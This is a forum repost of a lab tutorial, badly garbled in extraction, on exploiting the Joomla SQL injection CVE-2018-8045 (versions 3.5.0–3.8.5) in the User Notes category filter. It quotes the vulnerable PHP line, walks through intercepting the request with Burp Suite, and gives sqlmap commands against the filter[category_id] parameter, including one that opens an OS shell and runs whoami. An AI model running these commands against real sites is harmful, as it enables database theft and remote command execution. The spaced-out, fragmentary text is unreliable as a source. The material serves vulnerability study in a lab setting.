[19274] 2018-04-10_【动手实验】Joomla内核SQL注入漏洞

文档创建者:s7ckTeam
浏览次数:16
最后更新:2025-01-18
2018-04-10_【动手实验】Joomla内核SQL注入漏洞 J o o m l a S Q L i   2 0 1 8 - 0 4 - 1 0 J o o m l a 使 P H P M y S Q L L i n u x   W i n d o w s M a c O S X S Q L ( C V E - 2 0 1 8 - 8 0 4 5 J o o m l a S Q L U s e r   N o t e s S Q L 访 广 使 ~ W i n X P I P 1 7 2 . 1 6 . 1 1 . 2 h t t p : / / 1 7 2 . 1 6 . 1 2 . 2 : 8 0 8 1 / C V E - 2 0 1 8 - 8 0 4 5 C V E - 2 0 1 8 - 8 0 4 5 C V E - 2 0 1 8 - 8 0 4 5
B u r p s u i t e B u r p s u i t e w e b 使 S q l m a p S Q L 使 S Q L O s - s h e l l a d m i n i s t r a t o r c o m p o n e n t s c o m _ u s e r s m o d e l s n o t e s . p h p j o o m l a a d m i n i s t r a t o r c o m p o n e n t s c o m _ u s e r s c o n t r o l l e r s n o t e s . p h p / /   F i l t e r   b y   a   s i n g l e   o r   g r o u p   o f   c a t e g o r i e s . $ c a t e g o r y I d = $ t h i s - > g e t S t a t e ( ' f i l t e r . c a t e g o r y _ i d ' ) ; i f ( $ c a t e g o r y I d   & &   i s _ s c a l a r ( $ c a t e g o r y I d ) )   {       $ q u e r y - > w h e r e ( ' a . c a t i d   =   '   .   $ c a t e g o r y I d ) ;   } c a t e g o r y _ i d $ c a t e g o r y I d s q l S Q L J o o m l a !   3 . 5 . 0 - 3 . 8 . 5 1   S Q L f i r e f o x 访 h t t p : / / 1 7 2 . 1 6 . 1 2 . 2 : 8 0 8 1 / a d m i n i s t r a t o r / 使 a d m i n / a d m i n U s e r   - - >   U s e r   N o t e s   访 B u r p s u i t e F i r e f o x
B u r p s u i t e S e a r c h   T o o l s - - > U n c a t e g o r i s e d B u r p s u i t e U R L 便 B u r p s u i t e D e c o d e r S e n d t o   D e c o d e r D e c o d e r   a s   U R L
f i l t e r [ c a t e g o r y _ i d ] p o s t C J o o m l a . t x t 便 S Q L S q l m a p c m d C : T o o l s S Q L M a p s q l m a p . p y     - r   C : J o o m l a . t x t   - p   f i l t e r [ c a t e g o r y _ i d ]
2 :   S Q L m a p   O S - s h e l l 使 / t m p / , / t m p / S Q L m a p   o s - s h e l l  
c m d c d     C : T o o l s S q l M a p P y t h o n 绿 B i n ,   ( s q l m a p ) s q l m a p . e x e     - r   C : J o o m l a . t x t   - p   f i l t e r [ c a t e g o r y _ i d ]   - - o s - s h e l l S h e l l w h o a m i , s y s t e m
J o o m l a   3 . 8 . 5 ~
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则